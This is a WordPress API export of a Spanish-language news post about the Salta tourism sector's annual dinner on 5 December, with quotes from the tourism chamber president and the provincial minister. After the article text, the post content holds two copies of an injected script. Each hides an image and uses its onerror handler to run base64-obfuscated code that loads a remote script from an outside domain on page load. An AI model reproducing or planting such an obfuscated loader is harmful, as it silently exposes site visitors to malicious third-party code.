{"id":4617,"date":"2024-11-25T09:27:39","date_gmt":"2024-11-25T12:27:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4617"},"modified":"2025-08-13T23:44:54","modified_gmt":"2025-08-14T02:44:54","slug":"el-5-de-diciembre-todo-el-sector-turistico-de-salta-participara-en-la-cena-anual-de-la-actividad","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4617","title":{"rendered":"El 5 de diciembre todo el sector tur\u00edstico de Salta participar\u00e1 en la cena anual de la actividad"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-5953f4f30b6b4dbd4613208b903d1114\" style=\"background-color:#441924\"><em>Organizada por la C\u00e1mara de Turismo de Salta, cuenta con el acompa\u00f1amiento del Ministerio de Turismo y Deportes. Los presidentes de las instituciones tur\u00edsticas y de las c\u00e1maras del interior coordinan el encuentro de todos los protagonistas de la actividad.<\/em><\/h4>\n\n\n\n<p>La C\u00e1mara de Turismo de Salta invita para el 5 de diciembre a la cena anual del sector tur\u00edstico de Salta, por lo que hoy se realiz\u00f3 una reuni\u00f3n operativa en la que participaron presidentes de las instituciones que integran la entidad, referentes de c\u00e1maras del interior y el ministro de Turismo y Deportes, Mario Pe\u00f1a.<\/p>\n\n\n\n<p>La instituci\u00f3n madre de las entidades tur\u00edsticas, invita a los actores privados y p\u00fablicos que forman parte directa e indirectamente de la actividad al evento que se realizar\u00e1 en el Centro de Convenciones Salta y significa el cierre formal del a\u00f1o. Ese mismo d\u00eda, el Ministerio de Turismo y Deportes dar\u00e1 a conocer los datos cuantitativos y cualitativos del 2024.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14799-el-5-de-diciembre-todo-el-sector-turistico-de-salta-participara-en-la-cenal-anual-de-la-actividad.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14799-el-5-de-diciembre-todo-el-sector-turistico-de-salta-participara-en-la-cenal-anual-de-la-actividad.webp\" alt=\"El 5 de diciembre todo el sector tur\u00edstico de Salta participar\u00e1 en la cenal anual de la actividad\"\/><\/a><\/figure>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo,&nbsp;<strong>Juan Lucero<\/strong>, se\u00f1al\u00f3 que \u201cson muchos los actores que intervienen para que Salta sea uno de los destinos m\u00e1s elegidos del pa\u00eds, queremos reconocer el esfuerzo que hizo el sector en un a\u00f1o complejo, por eso invitamos a todo el sector privado y p\u00fablico de toda la provincia a formar parte de esa noche\u201d, adem\u00e1s aclar\u00f3 que \u201clas tarjetas de la cena pueden ser adquiridas en la entidad en tres cuotas sin inter\u00e9s con el Banco Macro proceso que se formalizar\u00e1 en los pr\u00f3ximos d\u00edas\u201d.<\/p>\n\n\n\n<p>El ministro<strong>&nbsp;Mario Pe\u00f1a<\/strong>&nbsp;agreg\u00f3 que \u201ces fundamental que los emprendedores tur\u00edsticos de toda la provincia puedan asistir, junto a los municipios, legisladores y todos aquellos que tienen representatividad. La actividad tur\u00edstica gestion\u00f3 un a\u00f1o dif\u00edcil, pero debemos redoblar los esfuerzos como nos pide el gobernador Gustavo S\u00e1enz, porque el turismo es uno de los sectores econ\u00f3micos m\u00e1s importantes de Salta\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El 5 de diciembre todo el sector tur\u00edstico de Salta participar\u00e1 en la cena anual de la actividad\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/o1WpqYTyQMU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Organizada por la C\u00e1mara de Turismo de Salta, cuenta con el acompa\u00f1amiento del Ministerio de Turismo y Deportes. Los presidentes de las instituciones tur\u00edsticas y de las c\u00e1maras del interior coordinan el encuentro de todos los protagonistas de la actividad. La C\u00e1mara de Turismo de Salta invita para el 5 de diciembre a la cena [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4618,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20,15],"tags":[],"class_list":{"0":"post-4617","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4617"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4617"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4617\/revisions"}],"predecessor-version":[{"id":6630,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4617\/revisions\/6630"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4618"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4617"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4617"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4617"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}